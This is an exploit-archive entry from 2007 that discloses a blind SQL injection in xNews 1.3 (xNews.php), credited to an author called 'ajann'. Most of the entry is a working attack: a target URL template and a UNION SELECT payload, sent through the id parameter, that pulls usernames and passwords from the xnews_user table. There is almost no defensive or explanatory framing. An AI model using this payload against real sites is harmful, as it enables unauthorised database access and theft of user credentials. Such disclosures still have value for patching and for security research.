id: 1439
date: 01/28/2007
title: xNews 1.3 (xNews.php) Remote SQL Injection Vulnerability
author: ajann
cves: 

========================================================
xNews 1.3 (xNews.php) Remote SQL Injection Vulnerability
========================================================



*******************************************************************************
# Title   :  xNews 1.3 (xNews.php) Remote Blind SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//xNews.php?act=shownews&id=[SQL]

Example:

//xNews.php?act=shownews&id=-1/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/xnews_user/**/where/**/id%20like%201/*

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!




#  0day.today [2023-03-22]  #